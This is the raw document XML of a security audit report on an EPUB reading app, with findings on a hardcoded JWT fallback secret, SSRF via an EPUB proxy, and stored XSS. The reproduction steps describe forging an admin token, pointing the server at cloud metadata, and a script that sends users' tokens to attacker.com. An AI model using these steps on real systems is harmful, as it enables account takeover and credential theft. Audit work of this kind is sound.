            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hardcoded JWT Secret Allows Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7089F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A160B7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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EDF40B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual code review (server.ts line 73)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DD6F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DEE6C5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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tcPr>
          <w:p w14:paraId="5589316D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C40F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3051D3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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143D1F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A07:2021 — Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3308E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278159">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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248B87">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-798: Use of Hard-coded Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4EB4D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2BF797">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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AEE91D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23FA8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FB7D4F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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8C3388">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The JWT_SECRET defaults to the string "your-secret-key" if .env.local is absent. Since server.ts is committed to a public GitHub repository, any attacker can read this value and forge valid JWTs for any user, including admin accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="33145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BE76D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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1A445F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Complete authentication bypass. Attacker gains admin access to upload malicious EPUBs, delete books, and access all user data. All other auth-dependent security controls are nullified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35C7A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6BE881">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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6EBC9F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Read server.ts line 73: const JWT_SECRET = process.env.JWT_SECRET || "your-secret-key" 2. Go to jwt.io 3. Create payload: {"id":"&lt;any-admin-userId&gt;","role":"admin"} 4. Sign with secret "your-secret-key" using HS256 5. Use forged token in Authorization header 6. Access any admin endpoint successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5230D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486652">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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1E0FCD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replace fallback with startup crash: if (!process.env.JWT_SECRET) throw new Error('JWT_SECRET required'). Generate strong secret with: node -e "console.log(require('crypto').randomBytes(64).toString('hex'))"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51BBD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160852">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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8B64E1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E39C47B">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62979D2B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-002: SSRF via EPUB Proxy Endpoint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D3B7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B4B9A5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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817C15">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E96D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0963DF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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493DBE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery via Unrestricted EPUB Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F042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27D0C3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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13EB4F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual code review + threat model (server.ts epub-proxy route)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D378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4031B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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tcPr>
          <w:p w14:paraId="7CBA94BF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14AC8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A60217">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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85FD9F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A10:2021 — Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="58FF0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C39FF9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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C00BD0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-918: Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7881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378FE1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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FC8204">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59553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D23109">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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CE7B25">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /api/books/epub-proxy/:id fetches the book's epubUrl from MongoDB and streams the response to the client. There is no allowlist of permitted target URLs. If epubUrl is set to an internal URL (e.g., http://169.254.169.254/ for cloud metadata, or http://localhost:27017 for MongoDB), the server makes that request and returns the response.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7BFE7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EAEE7A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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FC2152">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>On cloud deployments (AWS/GCP/Azure), attacker can exfiltrate IAM credentials, access internal services, and potentially compromise the entire cloud account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3EAD9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E57435">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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219570">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Gain admin access (via VD-001 or compromised account) 2. Use PUT /api/admin/books/:id to set a book's epubUrl to http://169.254.169.254/latest/meta-data/ 3. Request GET /api/books/epub-proxy/:id 4. Server fetches the internal URL and streams cloud metadata to attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1737A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B4A602">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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81069D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Implement URL allowlist: only permit epubUrl values matching gutenberg.org, standardebooks.org, or local /storage/ paths. Validate and reject private IP ranges (10.x, 172.16-31.x, 192.168.x, 169.254.x, localhost, 127.x).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11F5F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62F9DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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03FC55">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50DFC89C">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7305B365">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-003: Stored XSS via Malicious EPUB Upload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C6F4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B75798">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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6C0BA1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4AE09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357ECC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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388235">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting via EPUB with Embedded JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36A4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842195">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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720A1C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual code review (Reader.tsx + server.ts upload route)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="57A79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BBF597">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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tcPr>
          <w:p w14:paraId="1969ACAC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="75746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247A45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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E948A9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021 — Injection (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6EB89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96F937">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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5C73EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5D16A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C8F32D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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9E6F97">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.9 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53969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E437F4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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F14E28">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>epub.js is configured with allowScriptedContent: true in Reader.tsx. An admin uploads a crafted EPUB containing &lt;script&gt; tags in chapter HTML. When any user opens the book, the script executes in their browser context with full access to localStorage (where the JWT is stored).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68F22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D303DD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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8BA336">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistent XSS affecting every user who reads the infected book. JWT exfiltration enables full account takeover. The malicious payload persists in the book catalogue indefinitely.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F6B8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34EBF2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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2A5C58">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. Create EPUB with chapter HTML containing: &lt;script&gt;fetch('https://attacker.com/steal?t='+localStorage.getItem('token'))&lt;/script&gt; 2. Upload via POST /api/admin/books/upload (requires admin JWT) 3. Any user opens the book in the Reader 4. epub.js renders the chapter with allowScriptedContent:true 5. Script executes and sends JWT to attacker server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="36B55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674429">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
